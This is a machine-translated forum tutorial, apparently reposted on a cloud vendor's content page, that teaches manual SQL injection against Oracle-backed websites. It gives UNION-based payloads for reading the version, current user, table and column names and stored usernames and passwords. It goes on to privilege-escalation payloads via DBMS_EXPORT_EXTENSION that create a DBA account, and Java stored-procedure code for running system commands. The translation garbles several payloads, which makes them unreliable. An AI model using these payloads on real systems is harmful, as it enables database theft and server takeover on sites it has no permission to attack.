Manual ORACLE Database Injection

Source: Internet
Author: User

These days I have been confused and have never written any articles (I don't know what to write). Today I saw bystander write a manual mysql injection article. The key is to contribute more, this makes me feel excited. It's almost time off. It's estimated that after I write this article, it will be a few years after I come to the Forum. I don't have such a good talent. Let's take a look! According to the gourd painting, I also come to a directory: 0x00: Judge the Database Type 0x01: Get Basic Information 0x02: Get all the tables in the current database name 0x03: get all column names 0x04: Get the data in the column 0x05: Get all databases 0x06: Use the systeminfo permission of ORACLE to take down the server body below: Judge the injection, I will not talk about it anymore. Everyone is familiar with it. and 1 = 1 and 1 = 2. Of course, this article is based on the premise of being injected. If it is not found, skip this step. When we find the injection point, it is generally similar to asp/php/aspx? Id = 1 (I have not seen either of the other two, but I have seen asp + oracle). Add the annotator-. If the returned result is normal, it can be roughly determined that the database type is mssql or oracle, and then the query is based on the specific table in oracle, for example: and exist (select * from dual) or and exists (select * from user_tables) the usage principle is that the dual table and the user_tables table are the system tables in oracle and return normal, so we can be sure this is oracle. Then you will be crazy, because there are not many oracle injection tools. It can only be manual. 0 × 01 get basic information 1. after the injection is determined, we will look at several fields. We can also use oder by N to judge based on the returned page. We will not repeat them here because oracle has strict requirements on field types, therefore, before union queries, we must first determine the field type. You can use the following statement and 1 = 2 union select NULL, NULL ,......, NULL from dual-omitted in the middle, then replace the first NULL with 1, and 1 = 2 union select 1, NULL ,......, NULL from dual-omitted in the middle. If it is correct, it indicates that this field in the database is of the numerical type. If there is data in this column on the current page, it will also be displayed at a specific position on the current page. If the error occurs, replace it with and 1 = 2 union select '1', NULL ,......, If NULL from dual-is omitted in the middle, the returned result is normal, indicating that this column is of the character type. In the following example, we assume it is a number type with 6 fields 2. next, we obtain the database version and 1 = 2 union select 1, 2, (select banner from sys. v _ $ version where rownum = 1), 4,5, 6 from dual where SQL statement Nesting is used, and then query sys. v _ $ version: returns the banner information and database version information. then obtain the operating system version and 1 = 2 union select 1, 2, (select member from v $ logfile where rownum = 1), 4, 5, 6 from dual3. get the current user connected to the database and 1 = 2 union select, (select SYS_CONTEXT ('userenv', 'current _ user') from dual), 6 from Dual is now the basic information of the server, we can get it, then go down, you should know what to do. 0 × 02 obtain all the table names in the current database and 1 = 2 union select, (select table_name from user_tables where rownum = 1, 6 from dual oracle, all the tables in the database are saved in the user_tables table. In this way, we obtain the first table name, assume that news is followed by obtaining the second and 1 = 2 union select, (select table_name from user_tables where rownum = 1 and table_name <> 'News, 6 from dual, the second table name is obtained. Assume It is manage, and so on, we can get all table names 0x03: Get all column names and 1 = 2 union select 1, 2, (select column_name from user_t AB _columns where table_name = 'manage' and rownum = 1), 6 from dual system tables have more advantages. You can find everything in the system table. If you encounter blind injection, that's not crying. Then query the second table name. Assume that the first table obtains usernameand 1 = 2 union select 1, 2, (select column_name from user_tab_columns where table_name = 'manage' and rownum = 1 and column_name <> 'username'), 6 from dual, set password, and so on to get all the column names 0x04: There is nothing to say about getting the data in the specified column for data query in the column, like other databases, and 1 = 2 union select 1, 2, username, 6 from manageand 1 = 2 union select 1, 2, password, 6 from manage, the password can be 0x05: Get all databases. In this case, you need to cross-pants. I can't use it in this case. As for the reason, you can see it by yourself. First, the first database name and 1 = 2 union select, (select owner from all_tables where rownum = 1), 6 from dual, and then the second, assume that the first one is current_dband 1 = 2 union select, (select owner from all_tables where rownum = 1 and owner <> 'current _ user, 6. from dual, you should be familiar with it. 0x06: using ORACLE's systeminfo permission to win the server oracle itself is often running in the system, so oracle basically won the Server 1. first, add an account. The command used is as follows: and ''| SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" Create USER linux identified by linux "; END;-', 'sys ', 0, '1', 0) = "-2. check whether the account is successfully added and "| (select user_id from all_users where usernam E = 'linux ') 3. next, add the user we created to dba and "| SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" grant linux to rebeyond "; END;-', 'sys', 0, '1', 0) = "-4. after that, you can grant the remote connection permission and "| (select SYS. DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); EXECUTE IMM EDIATE "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" grant connect to linux "; END;-', SYS', 0, '1', 0) the remote connection is established under the from duclp. The first step after the connection is to establish the storage process is create or replace and compilejava souRCe named "util" asimport java. io. *; import java. lang. *; public class util extends Object {public static int RunThis (String args) {Runtime rt = Runtime. getRuntime (); int RC =-1; try {Process p = rt.exe c (args); int BufSize = 4096; BufferedInputStream bis = new BufferedInputStream (p. getInputStream (), bufSize); int len; byte buffer [] = new byte [bufSize]; // Echo back what the program spit outwhile (len = bis. read (buffer, 0, bufSize ))! =-1) System. out. write (buffer, 0, len); RC = p. waitFor ();} catch (Exception e) {e. printStackTrace (); RC =-1;} finally {return RC ;}} Step 2: www.2cto. comcreate or replacefunction RUN_CMz (p_cmd in varchar2) return numberaslanguage javaname 'util. runThis (java. lang. string) return integer '; Step 3: create or replace procedure RC (p_cmd in varChar) asx number; begmetadata: = RUN_CMz (p_cmd); end; after creation, you can run x: = RUN_CMz (doscommand) to execute Command line. (Note: I did not test it here) Now, I want you to know what it means.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.